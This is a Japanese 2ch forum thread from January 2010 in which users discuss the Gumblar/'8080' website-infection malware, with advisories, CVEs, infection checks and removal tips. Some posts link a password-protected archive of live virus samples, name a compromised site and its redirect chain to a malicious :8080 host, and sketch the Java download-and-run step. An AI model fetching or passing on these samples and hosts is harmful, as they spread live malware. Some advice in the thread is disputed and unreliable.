GUMBLARは、感染したコンピュータからID情報やパスワードを盗み出し、そのコンピュータが管理する
Webサイトを改ざんするコンピュータウイルスで、Webサイトにアクセスするだけで閲覧ユーザーにも感染
する、既にJR東日本 <9020> やホンダ <7267> などの大手企業のWebサイト感染が確認されている。
そこで、注目されるのがトレンドマイクロというわけ。
野村證券では2010年度の企業向けセキュリティ需要拡大を指摘、ガンブラー流行も需要回復の支えになる
と見ている。ウイルス対策未導入ユーザーの新規導入を促進できる可能性があるとしている。
0353名無しさん@お腹いっぱい。
2010/01/12(火) 11:14:30( ´,_ゝ`) プッ
0354名無しさん@お腹いっぱい。
2010/01/12(火) 11:54:360355名無しさん@お腹いっぱい。
2010/01/12(火) 12:06:430356名無しさん@お腹いっぱい。
2010/01/12(火) 12:12:18そう思うならそう思えばいいさー
0357名無しさん@お腹いっぱい。
2010/01/12(火) 12:45:430358名無しさん@お腹いっぱい。
2010/01/12(火) 13:18:34騒いでるのはこのスレだけw
0359名無しさん@お腹いっぱい。
2010/01/12(火) 13:30:59さっきもTVでやってたのに?
0360名無しさん@お腹いっぱい。
2010/01/12(火) 13:32:54ttp://blog.f-secure.jp/archives/50334036.html
Adobe Readerゼロデイの検出
ttp://blog.f-secure.jp/archives/50321539.html
New Gumblarとその亜種に関する注意喚起
ttp://blog.f-secure.jp/archives/50305625.html
"新"Gumblarに注意喚起
ttp://blog.f-secure.jp/archives/50295245.html
Adobe Acrobatゼロデイ分析
ttp://blog.f-secure.jp/archives/50315410.html
Gadgetadvisor.com の悪意ある IFrame
ttp://blog.f-secure.jp/archives/50243652.html
Adobe Acrobat Readerに新たに2種の脆弱性
ttp://blog.f-secure.jp/archives/50237796.html
0361名無しさん@お腹いっぱい。
2010/01/12(火) 13:36:35ここにいるようなちゃんと危機感持ってる連中は少数派。
やってても対岸の火事と思ってるやつばかりだと思うよ。
実際周りにちゃんと説明しても危機感持ってすぐ対策するやつは少なかった。
0362名無しさん@お腹いっぱい。
2010/01/12(火) 14:06:58このサイト見ると、avira先生がHTML/Crypted.Genって騒ぐから
genoチェックとかガンブラチェックとかやってみて見つからないんだけど、ただの誤検出かな?
0363名無しさん@お腹いっぱい。
2010/01/12(火) 14:28:08PC買ったときに入ってたマカフィーがあるから問題ない
怪しいサイトなんて見ないし
サイト持ってるからFTPは繋ぐけど、大したデータ入ってない
パソコンが壊れるわけじゃないだろうし、大丈夫
このスレ以外だとこんな人多いだろう
0364名無しさん@お腹いっぱい。
2010/01/12(火) 14:37:55たぶん誤。少なくともGumblarではない。
0365名無しさん@お腹いっぱい。
2010/01/12(火) 14:40:23度々ウイルス情報伝えてるのに、アホかと思う
営業の奴らなんて一日中あちこちのサイト見て回ってるのに
もういっそ感染して焦れと思う
0366名無しさん@お腹いっぱい。
2010/01/12(火) 14:44:43ただ、今回のやつで明るみにでたのが、企業のホームページ管理の杜撰さ(つっても、
この手の業界にいたやつなら、このウィルスはヤバイなと去年から思っていたと思うけど)だから、
危険度は間違いなく高レベル
0367名無しさん@お腹いっぱい。
2010/01/12(火) 14:45:370368名無しさん@お腹いっぱい。
2010/01/12(火) 14:52:33今年の一月二日にみたらJREが10(古!)でadobeも最新版でなかったし、
リーダーもスクリプトが動いていた。ブラウザもIEのみ。とりあえず、ざらっと更新かけた
アダルトサイトとかそういうのを見に行く人ではないんだけれども、運が悪かったら
どこかで感染していてもおかしくない。今度自分が休日のときにチェックしないといけない。
0369名無しさん@お腹いっぱい。
2010/01/12(火) 15:15:35HTML末尾にLGPLなどのスクリプトが書き込まれている
というのはわかるんですが、画像やswfなんかは
感染しないと考えておk???
0370名無しさん@お腹いっぱい。
2010/01/12(火) 15:53:59jsファイルは普通にやられる
0371名無しさん@お腹いっぱい。
2010/01/12(火) 16:02:590372名無しさん@お腹いっぱい。
2010/01/12(火) 16:26:23今回はAdobe Reader(未修正)とSun Java(仕様)・InternetExplorer(ActiveXまわり)が対象
0373名無しさん@お腹いっぱい。
2010/01/12(火) 16:36:05Java(仕様)っていうのを具体的に書いてある所はどこかにない?
すごく気になる
0374名無しさん@お腹いっぱい。
2010/01/12(火) 16:43:550375名無しさん@お腹いっぱい。
2010/01/12(火) 16:43:591 dataにウイルス本体のURLを入れてJavaGame.jarを起動
2 dataをダウンロード
3 dataを実行
4 終了
脆弱性ではなくJavaを悪用しただけ
ちなみに数日前ソースコードが上がっていた
0376名無しさん@お腹いっぱい。
2010/01/12(火) 16:56:54ノートン警察のブログパーツが改ざんされて、閲覧しただけでウイルスに感染する恐れがあった
それが8080系だったって話だろ
0377名無しさん@お腹いっぱい。
2010/01/12(火) 17:09:45ありがとう。
ノートンのブログパーツっていうのはHTML形式だったのか。
リブリーみたいなのしか知らなくて、ノートンもてっきりFLASHか何かかと
思ってたもんで感染と聞いて??となってた。
0378名無しさん@お腹いっぱい。
2010/01/12(火) 17:10:30サンクス!
JavaGame.jarでググったらCVE-2008-5353という古いJREの脆弱性に
行き当たったんだけどこれが仕様なの?
0379名無しさん@お腹いっぱい。
2010/01/12(火) 17:24:470380名無しさん@お腹いっぱい。
2010/01/12(火) 17:29:39仕様ってのは間違いでFA
0381名無しさん@お腹いっぱい。
2010/01/12(火) 17:53:51それは関係ないww
0382名無しさん@お腹いっぱい。
2010/01/12(火) 19:00:420383名無しさん@お腹いっぱい。
2010/01/12(火) 19:12:31>>266
0384名無しさん@お腹いっぱい。
2010/01/12(火) 19:14:22仕事でどうしても使うって人だけ最新版を薦めるようにして
0385名無しさん@お腹いっぱい。
2010/01/12(火) 19:17:49「ノートン インターネット セキュリティ 特別90日無償版」ダウンロードページ
http://www.symantecstore.jp/special/ameba/trial90/
0386名無しさん@お腹いっぱい。
2010/01/12(火) 19:51:53脆弱点を具体的に教えてくれているサイトはないものだろうか。
0387名無しさん@お腹いっぱい。
2010/01/12(火) 20:01:33今日までゼロデイなのはnewPlayer、これでググってわからんのなら
具体的にとか無理だから忘れろ。
Proxyを利用できるようにしました
0389名無しさん@お腹いっぱい。
2010/01/12(火) 20:40:44乙
0390名無しさん@お腹いっぱい。
2010/01/12(火) 21:35:44http://tsushima.2ch.net/test/read.cgi/newsplus/1263274820/
0391名無しさん@お腹いっぱい。
2010/01/12(火) 21:51:580392名無しさん@お腹いっぱい。
2010/01/12(火) 21:52:00いままでのならAdobeのサイトに載ってたような
0393名無しさん@お腹いっぱい。
2010/01/12(火) 23:02:23何時頃来るのかな
0394名無しさん@お腹いっぱい。
2010/01/12(火) 23:07:24Adobeは数時間遅かったような…。
0395名無しさん@お腹いっぱい。
2010/01/12(火) 23:39:42何を思ったのか無意識にダウンロードしてインストールしてた
0396名無しさん@お腹いっぱい。
2010/01/12(火) 23:43:490397名無しさん@お腹いっぱい。
2010/01/13(水) 00:00:03乙!
0398名無しさん@お腹いっぱい。
2010/01/13(水) 00:05:16?
0399名無しさん@お腹いっぱい。
2010/01/13(水) 00:06:16!
0400名無しさん@お腹いっぱい。
2010/01/13(水) 00:07:39・・・w
0401名無しさん@お腹いっぱい。
2010/01/13(水) 01:39:200402名無しさん@お腹いっぱい。
2010/01/13(水) 01:42:14逆に考えろ
→「敬意を払っている」
0403名無しさん@お腹いっぱい。
2010/01/13(水) 02:54:02GENOはどうやって感染したんだ?
オープンソースで配布されてるスクリプトの中にコードが仕込まれてて誰かが感染
でっ広がっていったのか?
こえぇな・・・
0404名無しさん@お腹いっぱい。
2010/01/13(水) 03:14:58>オープンソースで配布されてるスクリプトの中にコードが仕込まれてて
何言ってんだ?
0405名無しさん@お腹いっぱい。
2010/01/13(水) 03:16:30はいはい、新参乙
0406名無しさん@お腹いっぱい。
2010/01/13(水) 03:31:57CMSとか掲示板ってGPLやBSDライセンスで配布してるところあるだろ
その中に裏切り者がいたんじゃねーかなと
0407名無しさん@お腹いっぱい。
2010/01/13(水) 03:51:18いつ適用されるか分からないソースコードをいじるよりは、
botnet使って罠を踏ませた方が早いと思うが
0408名無しさん@お腹いっぱい。
2010/01/13(水) 06:06:53INTERNET Watch
シマンテック、「Gumblar」攻撃の新しいスクリプトを注意喚起 2010/01/12
年末年始にかけての攻撃は、2009年5月に流行した「Gumblar」との関連性は低いと見ているという
ttp://internet.watch.impress.co.jp/docs/news/20100112_341886.html
PC Online
『ガンブラー』はウイルスの名前ではない――シマンテックが解説 2010/01/12
オリジナルは2009年5月に出現、「感染するウイルスは同じとは限らない」
ttp://pc.nikkeibp.co.jp/article/news/20100112/1022144/
So-net
相次ぐサイト改ざん(1)(2) 注意が必要なのは「ガンブラー」ではなく「8080」 2010/01/12
「Gumblar亜種」と「ガンブラー」が招く困った事態
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2115
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2116
0409名無しさん@お腹いっぱい。
2010/01/13(水) 06:12:36So-netは素人だから名前にこだわってるだけ
他は攻撃名だといってるだけ
0410名無しさん@お腹いっぱい。
2010/01/13(水) 06:27:58so-netが一番的確だってどっかで読んだぞ
0411名無しさん@お腹いっぱい。
2010/01/13(水) 06:47:14ttp://internet.watch.impress.co.jp/docs/news/20100112_341802.html
ヤフーは9日、「Yahoo!占い」サイト内の「鏡リュウジの星に願いを」のページにおいて、
HTMLファイルの改ざんが確認されたことを公表した。当該ページの閲覧者にはウイルス感染の
恐れがあるとして、確認を呼びかけている。
改ざんが確認されたページは、「Yahoo!占い」サイト内の「鏡リュウジの星に願いを」で、
2009年10月13日号として掲載された「Vol.65 『食べ物に宿る魔法の力』」の2ページ。
改ざんされていた期間は2009年10月27日〜2010年1月8日で、この間に該当ページを閲覧したユーザーは
ウイルス「Gumblar」の亜種に感染している恐れがある。
0412名無しさん@お腹いっぱい。
2010/01/13(水) 06:54:00so-netの記事は向かないね
0413名無しさん@お腹いっぱい。
2010/01/13(水) 07:01:17そんなわけねえだろ
0414名無しさん@お腹いっぱい。
2010/01/13(水) 07:03:25「アドレス制限やファイヤウォールでは防ぎきれない」「Gumblarは耐解析機能があるため、閲覧先Webサイトが
安全かどうかチェックしてくれるソフトやサイトでも、判定は完全ではない」といった点があげられている。
ちなみに現在のGumblarの動作は、「手元のWindowsパソコンが感染する」「そのパソコンで更新している
Webサイトが改ざんされる」という2つの段階に分けられる。
まず、感染したサイトを閲覧した際に、脆弱性が利用され、パソコンが感染。
Gumblarのバイナリが送り込まれ、パソコン内に潜むようになる。そして、 FTPプロトコルを使って外部にアクセスした際に、
アカウントとパスワードを盗み出す。この盗んだアカウントでサイバー犯罪者(PC側のGumblarウイルス)はWebサイトにアクセスして、
サイトを改ざんするのだ。改ざんされたサイトを、第3者が閲覧することで、さらに感染が拡大することとなる。
ttp://www.rbbtoday.com/news/20100112/64882.html
0415名無しさん@お腹いっぱい。
2010/01/13(水) 07:08:43w
0416名無しさん@お腹いっぱい。
2010/01/13(水) 07:14:06エフセキュアブログ 間違いだらけのGumblar対策
ttp://blog.f-secure.jp/archives/50334036.html
0417名無しさん@お腹いっぱい。
2010/01/13(水) 07:20:43思いっきりツッコマれててワロタ
ttp://www3.atword.jp/gnome/2010/01/12/adobe-nightmares-night/
間違い?
少なくとも、
(略)
このへんから既に(この筆者自身が)錯綜してますが?
Gumblar.xの悪用脆弱性は、実はカテゴリー的には変わっていません。
Microsoft系が1つ増えただけで、FlashもAdobe Readerも旧来のものです。
問題となっている 8080は 絶賛ゼロディの Adobe Reader CVE-2009-4324 と、
Java JRE CVE-2008-5353 の双方がどちらも
(メーカPCにプリインストールの多い日本では特に)クリティカルなので、
こんだけパンデミックな問題になってるわけですが・・・
更に、8080系の使用している URL文字列をみても、
明らかに日本をターゲットにした攻撃になっています。
(でないと kakaku.comとか 2ch.netとかを埋め込んでくる意味がわかりません)
このURL文字列は IDS管理者がログをチェックした際に、
日本で一般的なドメインが混じっているためスルーしてしまうことを狙ったものです。
セキュ会社よりも so-net様のほうが的確ってのはどうなんでしょうね?
0418名無しさん@お腹いっぱい。
2010/01/13(水) 07:21:48.〜:8080にはリダイレクトされないんでしょ?
0419名無しさん@お腹いっぱい。
2010/01/13(水) 07:22:34そんなわけねえだろw
0420名無しさん@お腹いっぱい。
2010/01/13(水) 07:24:40思いっきりツッコマれててワロタ
0421名無しさん@お腹いっぱい。
2010/01/13(水) 07:26:47adobeは腹切って土下座しやがれ
0422名無しさん@お腹いっぱい。
2010/01/13(水) 07:27:54単純にGumblarの表現手法が違うだけだろ
ことさらに大げさに言うことじゃないわ
そのブログキモイ
0423名無しさん@お腹いっぱい。
2010/01/13(水) 07:29:47ttp://up3.viploader.net/pc/src/vlpc001801.png
0424名無しさん@お腹いっぱい。
2010/01/13(水) 07:31:27そうでない人で反応が違うのが面白いね
0425名無しさん@お腹いっぱい。
2010/01/13(水) 07:31:32アドビはよやれよ
0426名無しさん@お腹いっぱい。
2010/01/13(水) 07:31:59ttp://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.3/jpn/AdbeRdr930_ja_JP.exe
0427名無しさん@お腹いっぱい。
2010/01/13(水) 07:32:36偉そうな>>424に乾杯
0428名無しさん@お腹いっぱい。
2010/01/13(水) 07:38:52やたらとGENOにこだわる人もいますwww
0429名無しさん@お腹いっぱい。
2010/01/13(水) 07:39:46(*>艸<)キャァッ
0430名無しさん@お腹いっぱい。
2010/01/13(水) 07:41:170431名無しさん@お腹いっぱい。
2010/01/13(水) 07:45:14ttp://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.3/jpn/AdbeRdr930_ja_JP.exe
ttp://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.3/jpn/AdbeRdr930_ja_JP.msi
ftp://ftp.adobe.com/pub/adobe/reader/win/9.x/9.3/jpn/AdbeRdr930_ja_JP.exe
ftp://ftp.adobe.com/pub/adobe/reader/win/9.x/9.3/jpn/AdbeRdr930_ja_JP.msi
0432名無しさん@お腹いっぱい。
2010/01/13(水) 07:45:520433名無しさん@お腹いっぱい。
2010/01/13(水) 07:47:390434名無しさん@お腹いっぱい。
2010/01/13(水) 07:48:480435名無しさん@お腹いっぱい。
2010/01/13(水) 07:51:19モザイクかけといてくれ
モ有で
0436名無しさん@お腹いっぱい。
2010/01/13(水) 07:54:09使ってる人あまり居ないと思った(使ってる人は自力で取りに行くと思った)ので
わざわざ貼らんかった。
ftp://ftp.adobe.com/pub/adobe/acrobat/win/9.x/9.3/misc/
ftp://ftp.adobe.com/pub/adobe/ からたどれば基本的に全部いただける。
0437名無しさん@お腹いっぱい。
2010/01/13(水) 07:55:53他のReaderにすればいいジャマイカ
0438名無しさん@お腹いっぱい。
2010/01/13(水) 08:10:36Foxitの脆弱性が攻撃に使われたこともありますー(IBM東京SOC談)
0439名無しさん@お腹いっぱい。
2010/01/13(水) 08:16:260440名無しさん@お腹いっぱい。
2010/01/13(水) 08:37:030441名無しさん@お腹いっぱい。
2010/01/13(水) 08:42:380442名無しさん@お腹いっぱい。
2010/01/13(水) 08:52:100443名無しさん@お腹いっぱい。
2010/01/13(水) 09:15:190444名無しさん@お腹いっぱい。
2010/01/13(水) 10:33:55ソースを確認したら/*LGPL*/が入ってた。
サイト運営者に通報したら、こんな答えが返ってきた
今回の件は、現在、調査、修正作業中ですが、保守業者に確認したところ、スクリプトの改ざんウィルスであったことが判明しております。
「改ざん」なので閲覧での感染はないとの報告を受けております。
この認識って合ってるのか?
0445名無しさん@お腹いっぱい。
2010/01/13(水) 10:51:43やっときたよ
0446名無しさん@お腹いっぱい。
2010/01/13(水) 10:52:39間違ってるね
0447名無しさん@お腹いっぱい。
2010/01/13(水) 10:57:07なんという阿呆な回答
ふざけんな勉強しろと言ってやれ
0448名無しさん@お腹いっぱい。
2010/01/13(水) 10:58:430449名無しさん@お腹いっぱい。
2010/01/13(水) 11:16:10ワロタ
0450名無しさん@お腹いっぱい。
2010/01/13(水) 11:17:160452名無しさん@お腹いっぱい。
2010/01/13(水) 11:31:21http://up3.viploader.net/pc/src/vlpc001803.png
0453名無しさん@お腹いっぱい。
2010/01/13(水) 11:34:22とかいいつつ「感染してみた」系のブログとかで
感染後もスタートアップ変化なし、HPも改ざんもされないという報告をみて
混乱気味だ。はやく感染確認方法判明してほしいな。
0454名無しさん@お腹いっぱい。
2010/01/13(水) 11:40:09>役所関連
晒せ
0455名無しさん@お腹いっぱい。
2010/01/13(水) 11:43:590456名無しさん@お腹いっぱい。
2010/01/13(水) 11:48:52数日前にgenoウィルスらしきものをavast先生が検知したんだけど、
昨日、前触れもなくBSOD。ハードウェア回りも疑ってみたけど、
心当たりがあるばっかりに放置する気にはなれず、泣く泣く再インストする羽目に…
GENOウィルスってPC起動できなくなるような症状ってあるの?
0457名無しさん@お腹いっぱい。
2010/01/13(水) 12:04:52GENOにはある(症状は違う気がするが)
8080は今の所不明
ところで最近流行ってるのは8080だが、それは本当にGENOなのか?
0458名無しさん@お腹いっぱい。
2010/01/13(水) 12:15:490459名無しさん@お腹いっぱい。
2010/01/13(水) 12:27:480460名無しさん@お腹いっぱい。
2010/01/13(水) 13:21:04アクティブスクリプトを無効にしてたのに、
どこぞのサイトでflashが再生されよった
「activexコントロールとプラグインの実行」
これも無効にしないといけないの?
0461名無しさん@お腹いっぱい。
2010/01/13(水) 13:42:270462名無しさん@お腹いっぱい。
2010/01/13(水) 14:10:58http://pc11.2ch.net/test/read.cgi/sec/1261930389/754
0463名無しさん@お腹いっぱい。
2010/01/13(水) 14:13:32各所で調べた所、どうもこのウィルスと関係ありそうなんでここで質問させてください
昨日1/12日にsecurity toolという類のウィルスに感染してしまったんです
どうやらこれはとある場所のwiki(現在は復旧済み)のwebページを改ざんしたものらしいのですが
このウィルスについてよくわかりません
感染後即システムの復元→ノートンで検出されなかったのでウィルスバスター購入
という手順で今の所特に動作に支障はおきていませんが、完全に駆除できないと書かれているので途方にくれています
もしよろしければsecurity toolについて詳しい説明をお願いできませんでしょうか
wikiのwebページが改ざんされていたという事なのですが
これは個人がスクリプトか何かを仕込んでいたという事ですか?
0464名無しさん@お腹いっぱい。
2010/01/13(水) 14:26:47Wikipedia?
0465名無しさん@お腹いっぱい。
2010/01/13(水) 14:29:08@wikiのとあるページです
もう復旧しているみたいですが
何回かウィルススクリプトが貼り付けられたようで
何度かノートンが反応した事があります
0466名無しさん@お腹いっぱい。
2010/01/13(水) 15:24:08PC初心者
http://pc11.2ch.net/pcqa/
0467名無しさん@お腹いっぱい。
2010/01/13(水) 15:40:06初心者とかのレベルじゃねーわ
0468名無しさん@お腹いっぱい。
2010/01/13(水) 16:45:06otu
0469名無しさん@お腹いっぱい。
2010/01/13(水) 16:49:100470名無しさん@お腹いっぱい。
2010/01/13(水) 16:55:260471名無しさん@お腹いっぱい。
2010/01/13(水) 16:56:370472名無しさん@お腹いっぱい。
2010/01/13(水) 16:58:59http://pc11.2ch.net/test/read.cgi/sec/1261107653/
インストール不要でKasperskyエンジン使いたい人は、
これ使えば安心だね。
0473名無しさん@お腹いっぱい。
2010/01/13(水) 17:16:570474名無しさん@お腹いっぱい。
2010/01/13(水) 17:30:248080系に改ざんされてるサイトを踏んだので感染してるか確かめたいんだけど
>>7で確認した所
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
"~TM6.tmp"="C:\\WINDOWS\\TEMP\\~TM6.tmp"
も無かったんだけど白って事でいいんでしょうか?
0475名無しさん@お腹いっぱい。
2010/01/13(水) 17:31:090476名無しさん@お腹いっぱい。
2010/01/13(水) 17:39:56まだ完全には解ってないみたいだし。
踏んだ後の挙動もあまりハッキリしてない。
悪さをするPDFファイルが落ちてきて reader が起動するとかなんとか。
0477名無しさん@お腹いっぱい。
2010/01/13(水) 17:46:02疑心暗鬼になるよりクリーンインストールしてきたほうが
精神上良いのでサクッとしてきます
0478名無しさん@お腹いっぱい。
2010/01/13(水) 17:50:47管理人氏>
fileseek.net/
fileseek.jp/
↑
弾くの(403)は勘弁して・・
0479名無しさん@お腹いっぱい。
2010/01/13(水) 17:55:35_.,,,,,,.....,,, ./ ::: \
/::::::::::::::::::::::"/ /⌒\::: \
/:::::::::::::::::::::::::ノ《 / \::: \
/::::::;;;;...-‐'""´´ 《_/ヽヽ \::: |
|::::::::| 。 ┃....|;ノ  ̄
|::::::/ ,,,..... ...,,,,, ||
,ヘ;;| -・‐, ‐・=.|
(〔y -ー'' | ''ー .|
ヽ,,,, ノ(,、_,.)ヽ |
ヾ.| /,--╂、 ./
|\  ̄二´ /
_ /:|\ ....,,,,./\___
管 理人
拒否設定を変更しました、別サイトで使ってたhttpd.configをコピペして使ったのが原因のようです
0481名無しさん@お腹いっぱい。
2010/01/13(水) 19:02:450482名無しさん@お腹いっぱい。
2010/01/13(水) 19:13:210483名無しさん@お腹いっぱい。
2010/01/13(水) 19:17:260484名無しさん@お腹いっぱい。
2010/01/13(水) 19:24:01>>481 携帯でPCサイトを見るためのProxy
※ヒント「FireMobileSimulator」
0485名無しさん@お腹いっぱい。
2010/01/13(水) 19:31:580486名無しさん@お腹いっぱい。
2010/01/13(水) 19:50:13http://www.47news.jp/CN/201001/CN2010011301000588.html
0487名無しさん@お腹いっぱい。
2010/01/13(水) 19:50:24ttp://www.asahi.com/national/update/0113/TKY201001130361.html
0488名無しさん@お腹いっぱい。
2010/01/13(水) 20:25:22ttp://www.yomiuri.co.jp/national/news/20100113-OYT1T01189.htm
0489名無しさん@お腹いっぱい。
2010/01/13(水) 20:41:53Gumblar.xは亜種だろうけど、8080は違うんじゃね?
0490名無しさん@お腹いっぱい。
2010/01/13(水) 20:42:42ttp://haohao.shiawasehp.net/hao2a1.html
企業のお偉いさん、hpの製作会社さん
「ハオハオ」よんw
0491名無しさん@お腹いっぱい。
2010/01/13(水) 20:49:360492名無しさん@お腹いっぱい。
2010/01/13(水) 21:05:33//www.s-visagiftcard.com
今現在403になってるからここだろうな
0493名無しさん@お腹いっぱい。
2010/01/13(水) 21:19:15pass: virus
ガンブラー系のまとめきますた。
0494名無しさん@お腹いっぱい。
2010/01/13(水) 21:25:26中身何?
0495名無しさん@お腹いっぱい。
2010/01/13(水) 21:28:30今のところすべて検出可能だ
0497名無しさん@お腹いっぱい。
2010/01/13(水) 23:04:28Bingのキャッシュに/*GNU GPL*/
0498名無しさん@お腹いっぱい。
2010/01/13(水) 23:11:39γ⌒ヽ
< ・、,,,;;,)
< つ=つ
ノ ノ三)
∠、 m)=m)
ガンプラー
(2009 〜 )
0499名無しさん@お腹いっぱい。
2010/01/13(水) 23:23:340500名無しさん@お腹いっぱい。
2010/01/13(水) 23:27:41,,-' _,,-''" "''- ,,_  ̄"''-,,__ ''--,,__
,,-''" ,, --''"ニ_―- _ ''-,,_ ゞ "-
て / ,,-",-''i|  ̄|i''-、 ヾ {
(" ./ i {;;;;;;;i| .|i;;;;;;) ,ノ ii
,, ( l, `'-i| |i;;-' ,,-'" _,,-"
"'-,, `-,,,,-'--''::: ̄:::::::''ニ;;-==,_____ '" _,,--''"
 ̄"''-- _-'':::::" ̄::::::::::::::::;;;;----;;;;;;;;::::`::"''::---,,_ __,,-''"
._,,-'ニ-''ニ--''" ̄.i| ̄ |i-----,, ̄`"''-;;::''-`-,,
,,-''::::二-''" .--i| .|i "- ;;:::`、
._,-"::::/  ̄"''--- i| |i ヽ::::i
.(:::::{:(i(____ i| .|i _,,-':/:::}
`''-,_ヽ:::::''- ,,__,,,, _______i| .|i--__,,----..--'''":::::ノ,,-'
"--;;;;;;;;;;;;;;;;;""''--;;i| .|i二;;;;;::---;;;;;;;::--''"~
 ̄ ̄"..i| .|i
.i| |i
i| |i
.i| .|i
.i| |i
.i| ,,-、 、 |i
i| ノ::::i:::トiヽ、_.|i
_,, i|/"ヽ/:iヽ!::::::::ノ:::::Λ::::ヽ|i__n、ト、
,,/^ヽ,-''":::i/::::::::/:::::|i/;;;;;;/::::;;;;ノ⌒ヽノ::::::::::::ヽ,_Λ
;;;;;;:::::;;;;;;;;;;:::::;;;;;;;;:::/;;;;;;:::::::::;;;;;;/;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::::::::::;;:;;;;:::ヽ
0501名無しさん@お腹いっぱい。
2010/01/13(水) 23:44:34なんだそんなに可愛いのか
警戒して損したわ
ノーガードに戻そう
0502名無しさん@お腹いっぱい。
2010/01/13(水) 23:45:330503名無しさん@お腹いっぱい。
2010/01/13(水) 23:48:170504名無しさん@お腹いっぱい。
2010/01/13(水) 23:48:480505名無しさん@お腹いっぱい。
2010/01/13(水) 23:49:41かわえええ
飼いたい
0506名無しさん@お腹いっぱい。
2010/01/13(水) 23:52:07γ| |⌒ヽ
< |三 アイヤー 三 ・、,,,;;,)
< | ≡ ∧∧ ≡|つ=つ
ノ | ∧∧/ 支\∧∧ | ノ三)
∠、 m|<`∀´( `ハ´ )`∀´>|)=m)
,|( 北 ( φφ )¶ 韓)|
| ̄ ̄ ̄ ̄ ̄ ̄ | |
0507名無しさん@お腹いっぱい。
2010/01/13(水) 23:53:430508名無しさん@お腹いっぱい。
2010/01/13(水) 23:57:04この中のが実行されるとリダイレクトされて
不正pdfふみにいくって認識でおk?
0509名無しさん@お腹いっぱい。
2010/01/14(木) 00:01:01ttp://labs-uploader.sabaitiba.com/virus/download/1263288905.7z
virus
0510名無しさん@お腹いっぱい。
2010/01/14(木) 01:17:31ああいう事あったんだからサムネ出ないようにしてくれよ、念のため
0511名無しさん@お腹いっぱい。
2010/01/14(木) 01:17:530512名無しさん@お腹いっぱい。
2010/01/14(木) 02:59:030513名無しさん@お腹いっぱい。
2010/01/14(木) 03:04:220514名無しさん@お腹いっぱい。
2010/01/14(木) 03:09:310515名無しさん@お腹いっぱい。
2010/01/14(木) 03:11:510516名無しさん@お腹いっぱい。
2010/01/14(木) 04:05:25君以外の人のところには24時間以上前に来てるよ。
0517名無しさん@お腹いっぱい。
2010/01/14(木) 04:34:18この様子じゃまだ被害増えそうな気がする
おちおちネットもできやしない
0518名無しさん@お腹いっぱい。
2010/01/14(木) 04:48:03あとは今後の新規ゼロデイ情報かな
0519名無しさん@お腹いっぱい。
2010/01/14(木) 05:28:290520名無しさん@お腹いっぱい。
2010/01/14(木) 05:54:32ttp://java.sun.com/javase/6/webnotes/6u18.html
0521名無しさん@お腹いっぱい。
2010/01/14(木) 06:10:410522名無しさん@お腹いっぱい。
2010/01/14(木) 06:16:04Bug Fixes
This feature release does not contain any new fixes for security vulnerabilities to its previous release,
Java SE 6 Update 17. Users who have Java SE 6 Update 17 have the latest security fixes and do not need
to upgrade to this release to be current on security fixes.
0523名無しさん@お腹いっぱい。
2010/01/14(木) 07:05:510524名無しさん@お腹いっぱい。
2010/01/14(木) 08:22:490525名無しさん@お腹いっぱい。
2010/01/14(木) 09:14:520526名無しさん@お腹いっぱい。
2010/01/14(木) 10:51:260527名無しさん@お腹いっぱい。
2010/01/14(木) 10:55:57そこがまたこわい
目に見えて変な動きするわけじゃないでしょ?
0528名無しさん@お腹いっぱい。
2010/01/14(木) 10:56:03個人サイトやアンダーグラウンドな所とかアダルト系は見つからず長期間放置されそうだな
0529名無しさん@お腹いっぱい。
2010/01/14(木) 10:58:31ttp://www.bing.com/search?q=%22.replace%28%2F%5C%29%7C%26%7C%23%7C%5C%28%7C%5C%5E%7C%40%7C%5C%21%7C%5C%24%2Fig%2C%22&go=&form=QBRE&filt=all
0530名無しさん@お腹いっぱい。
2010/01/14(木) 11:07:07自動アップデートが来てからでいいかなあ・・・
0531名無しさん@お腹いっぱい。
2010/01/14(木) 11:10:280532名無しさん@お腹いっぱい。
2010/01/14(木) 11:26:43tp://www●maschinen-makler●eu/
↓
http://archive-org●pixnet●net●eorezo-com●thechocolateweb●ru:8080/gameztar●com/gameztar●com/google●com/rakuten●ne●j ・・(?
--
/artikel.php?intern=XX
XX=1〜65(もっとあるかも)
/anfahrt/Anfahrt_reso_Siegen.pdf
/anfahrt/Anfahrt_reso_Koeln.pdf
/anfahrt/Anfahrt_reso_frankfurt.pdf
/katalog/katalog.pdf
※pdfの中身は調べてないー
0533名無しさん@お腹いっぱい。
2010/01/14(木) 13:31:030534名無しさん@お腹いっぱい。
2010/01/14(木) 13:39:07外部のファイラやコマンドプロンプトからなら見れるだろうから、確認だけならセーフモードでなくてもいいと思う。
0535名無しさん@お腹いっぱい。
2010/01/14(木) 13:40:26セーフモードじゃないと削除するウイルス・ファイルが見えないらしい
あと >>6 は一部間違ってるから削除するときは気をつけて
>>51,54 の通り
○ C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\スタートアップ\siszyd32.exe
× C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe
0536名無しさん@お腹いっぱい。
2010/01/14(木) 13:51:54ありがとうございます
0537名無しさん@お腹いっぱい。
2010/01/14(木) 14:32:55syszyの削除にはセーフモードか、表示可能な外部ファイラ
って感じでよいですかね?
セーフモードが一番確実かも知れませんが
0538名無しさん@お腹いっぱい。
2010/01/14(木) 16:02:020539名無しさん@お腹いっぱい。
2010/01/14(木) 16:09:02なんで「もしかしたらだめかも」な通常モードでやろうとするのか理解できん。
0540名無しさん@お腹いっぱい。
2010/01/14(木) 16:14:04ttp://www.virustotal.com/jp/analisis/5e92dd5fe8561605a0ecb138725d27373503d129195357edf3e8eef6a0a4685c-1259371503
うんこMSEは未対応
0541名無しさん@お腹いっぱい。
2010/01/14(木) 16:51:26どこのコピペか知らんがPCTools Prevx Symantecの3社製品以外全部未対応のうんこじゃん
0542名無しさん@お腹いっぱい。
2010/01/14(木) 16:56:37( ´,_ゝ`)プッ
0543名無しさん@お腹いっぱい。
2010/01/14(木) 17:00:32ttp://java.sun.com/javase/6/webnotes/6u18.html#bugfixes-1.6.0_18
これ見るとu17からのバグ修正めちゃめちゃ多くされてね?
0544名無しさん@お腹いっぱい。
2010/01/14(木) 17:34:540545名無しさん@お腹いっぱい。
